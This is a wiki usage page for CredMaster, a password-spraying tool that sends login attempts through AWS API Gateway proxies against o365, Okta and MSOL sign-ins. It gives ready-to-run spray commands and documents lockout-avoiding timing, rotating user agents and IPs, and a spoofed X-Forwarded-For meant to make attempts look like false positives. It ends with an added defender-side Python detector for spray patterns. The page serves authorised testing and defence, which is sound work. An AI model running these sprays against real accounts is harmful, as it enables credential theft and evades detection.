Usage
Ellis Springe edited this page Feb 20, 2024
A few prerequisites are required to use CredMaster to the fullest.
- AWS access keys
- Python3
- A supported target
AWS access keys can be acquired from the AWS website; a helpful blog post on the pass-through proxy setup can be found here: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

This will run the o365 module with 5 threads and a 10-20 second jitter. It will attempt 3 passwords every 6 hrs (360 min).

```bash
python3 credmaster.py --access_key <key> --secret_access_key <key> \
  --plugin o365 \
  -u userfile.txt -p passfile.txt -a useragents.txt -o outputfile \
  -t 5 -j 20 -m 10 -d 360 --passwordsperdelay 3
```
This will run the Okta module with one thread and a 10-30 second jitter. It will attempt one password every hour (60 min) with a randomized user list.

```bash
python3 credmaster.py --access_key <key> --secret_access_key <key> \
  --plugin okta -u userfile.txt -p passfile.txt -a useragents.txt -o outputfile \
  -t 1 -j 30 -m 10 -d 60 --passwordsperdelay 1 -r --url https://example.okta.com
```
This will run the MSOL module with a userpass file and a config file, adding a custom header to each request for attribution.

```bash
python3 credmaster.py --config aws.config --plugin msol -f userpass.txt -a useragents.txt --header "X-ID: ABCD"
```
Destroy all FireProx-created APIs:

```bash
python3 credmaster.py {access args} --clean
```

List all APIs with ID, name and creation date:

```bash
python3 credmaster.py {access args} --api_list
```

Delete a single API:

```bash
python3 credmaster.py {access args} --api_destroy {api id}
```
Full option list:

```
options:
-h, --help show this help message and exit
Basic Inputs:
--plugin PLUGIN Spray plugin
-u USERFILE, --userfile USERFILE
Username file
-p PASSWORDFILE, --passwordfile PASSWORDFILE
Password file
-f USERPASSFILE, --userpassfile USERPASSFILE
Username-Password file (one-to-one map, colon separated)
-a USERAGENTFILE, --useragentfile USERAGENTFILE
Useragent file
--config CONFIG Configure CredMaster using config file config.json
Advanced Inputs:
-o OUTFILE, --outfile OUTFILE
Output file to write contents (omit extension)
-t THREADS, --threads THREADS
Thread count (default 1, max 15)
--region REGION Specify AWS Region to create API Gateways in
-j JITTER, --jitter JITTER
Jitter delay between requests in seconds (applies per-thread)
-m JITTER_MIN, --jitter_min JITTER_MIN
Minimum jitter time in seconds, defaults to 0
-d DELAY, --delay DELAY
Delay between unique passwords, in minutes
--passwordsperdelay PASSWORDSPERDELAY
Number of passwords to be tested per delay cycle
--batch_size BATCH_SIZE
Number of request to perform per thread
--batch_delay BATCH_DELAY
Delay between each thread batch, in minutes
-r, --randomize Randomize the input list of usernames to spray (will remain the same password)
--header HEADER Add a custom header to each request for attribution, specify "X-Header: value"
--xforwardedfor XFORWARDEDFOR
Make the X-Forwarded-For header a static IP instead of RNG
--weekday_warrior WEEKDAY_WARRIOR
If you don't know what this is don't use it, input is timezone UTC offset
--color Output spray results in Green/Yellow/Red colors
--trim, --remove Remove users with found credentials from future sprays
Notification Inputs:
--slack_webhook SLACK_WEBHOOK
Webhook link for Slack notifications
--pushover_token PUSHOVER_TOKEN
Token for Pushover notifications
--pushover_user PUSHOVER_USER
User for Pushover notifications
--ntfy_topic NTFY_TOPIC
Topic for Ntfy notifications
--ntfy_host NTFY_HOST
Ntfy host for notifications
--ntfy_token NTFY_TOKEN
Ntfy token for private instances
--discord_webhook DISCORD_WEBHOOK
Webhook link for Discord notifications
--teams_webhook TEAMS_WEBHOOK
Webhook link for Teams notifications
--keybase_webhook KEYBASE_WEBHOOK
Webhook for Keybase notifications
--operator_id OPERATOR_ID
Optional Operator ID for notifications
--exclude_password Exclude discovered password in Notification message
Fireprox Connection Inputs:
--profile_name PROFILE_NAME, --profile PROFILE_NAME
AWS Profile Name to store/retrieve credentials
--access_key ACCESS_KEY
AWS Access Key
--secret_access_key SECRET_ACCESS_KEY
AWS Secret Access Key
--session_token SESSION_TOKEN
AWS Session Token
Fireprox Utility Options:
--clean Clean up all fireprox AWS APIs from every region, warning irreversible
--api_destroy API_DESTROY
Destroy single API instance, by API ID
--api_list List all fireprox APIs
```
- `--threads`: The number of attempts to make at the same time. Each thread is a unique AWS region so there is less overlap. The max number of threads is 15.
- `--useragentfile`: A list of user agents to rotate through while password spraying.
- `--userpassfile`: A file containing username and password combinations, separated by a colon.
- `--plugin`: The module/target you wish to use during your password spraying attempts.
- `--jitter` and `--jitter_min`: Upper and lower jitter limits; alters the time between login attempts.
- `--delay`: Provided with a password list, this option sets the amount of time to wait before attempting the next password in the file. This is helpful for preventing rate-limiting and account lockouts.
- `--randomize`: Take the input list of users and randomize the order in which the users are attempted.
- `--header`: Add a custom specified header to each authentication request made. Helpful for when a client wants to know which attempts were yours, so they can be attributed.
- `--xforwardedfor`: Statically set the X-Forwarded-For header, which by default is randomized. Specifying the fake source IP as part of your client's IP range may make them believe it is a false positive.
- `--weekday_warrior`: Spray at 7AM, 11AM and 3PM based off an input UTC time, best for blending into network traffic.
- `--passwordsperdelay`: The number of passwords per delay cycle. This is helpful for when the lockout counter is high (10 passwords) and you can spray more than one password per delay.
- `--access_key`, `--secret_access_key`, `--profile_name` and `--session_token`: Parameters for AWS access to create FireProx API proxies for use during spraying.
- `--config`: An easy way to specify a file that you can store your AWS access tokens in. A template can be found in this repo.
- `--clean`: Remove all APIs from AWS. If you cancel your operations mid-spray, CredMaster may leave API gateways configured. This cleans them up.
- `--api_destroy`: Remove a single API by ID.
- `--api_list`: List all APIs with information about them.
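A defender-side counterpart to the attribution header and the spray timing described above, as an added example that is not part of CredMaster: it splits sign-in events carrying the agreed X-ID value from everything else, then flags windows in which failed logins hit many distinct users from many distinct source IPs, which is the shape a threaded, jittered spray through rotating proxies leaves in logs. The log format, the agreed value ABCD and all IP addresses are constructed for the example.

```python
"""Defender-side checks for sign-in logs: separate authorised-test traffic carrying the
agreed attribution header from everything else, and flag spray-shaped failure windows.
Added example, not part of CredMaster."""
import json
from datetime import datetime, timedelta

# Constructed sample sign-in events (not real logs). "x_id" is the value of the X-ID
# attribution header agreed with the tester, or null when the request carried none.
SAMPLE_LOG = """
{"ts": "2024-02-20T07:00:01Z", "user": "alice", "src": "3.1.1.10",  "ua": "UA-1", "ok": false, "x_id": "ABCD"}
{"ts": "2024-02-20T07:00:19Z", "user": "bob",   "src": "18.2.2.20", "ua": "UA-2", "ok": false, "x_id": "ABCD"}
{"ts": "2024-02-20T07:00:33Z", "user": "carol", "src": "52.3.3.30", "ua": "UA-3", "ok": false, "x_id": "ABCD"}
{"ts": "2024-02-20T07:00:48Z", "user": "dave",  "src": "13.4.4.40", "ua": "UA-1", "ok": false, "x_id": "ABCD"}
{"ts": "2024-02-20T07:01:02Z", "user": "erin",  "src": "35.5.5.50", "ua": "UA-2", "ok": false, "x_id": "ABCD"}
{"ts": "2024-02-20T07:05:00Z", "user": "alice", "src": "10.0.0.5",  "ua": "UA-9", "ok": true,  "x_id": null}
{"ts": "2024-02-20T09:00:00Z", "user": "frank", "src": "10.0.0.6",  "ua": "UA-9", "ok": false, "x_id": null}
{"ts": "2024-02-20T09:00:05Z", "user": "frank", "src": "10.0.0.6",  "ua": "UA-9", "ok": false, "x_id": null}
"""

def parse_events(text):
    """One JSON object per line; timestamps become datetimes for window arithmetic."""
    events = [json.loads(line) for line in text.strip().splitlines()]
    for e in events:
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return events

def split_attributed(events, agreed_x_id):
    """Events carrying the agreed X-ID belong to the engagement; the rest need triage."""
    ours = [e for e in events if e.get("x_id") == agreed_x_id]
    rest = [e for e in events if e.get("x_id") != agreed_x_id]
    return ours, rest

def spray_windows(events, window=timedelta(minutes=10), min_users=4, min_srcs=3):
    """Return (start, users) for each window whose failed logins hit many distinct users
    from many distinct source IPs: one password tried down a user list through rotating
    proxies, which is what the threads/jitter/delay options above produce."""
    fails = sorted((e for e in events if not e["ok"]), key=lambda e: e["ts"])
    hits, i = [], 0
    while i < len(fails):
        first, users, srcs, j = fails[i], set(), set(), i
        while j < len(fails) and fails[j]["ts"] - first["ts"] <= window:
            users.add(fails[j]["user"]); srcs.add(fails[j]["src"]); j += 1
        if len(users) >= min_users and len(srcs) >= min_srcs:
            hits.append((first["ts"], sorted(users)))
            i = j  # skip the rest of this burst so sub-windows are not re-reported
        else:
            i += 1
    return hits
```

Tune `window`, `min_users` and `min_srcs` to the tenant's normal failure rate; a low-and-slow spray with a long `--delay` needs a window at least as long as that delay to be caught by this check.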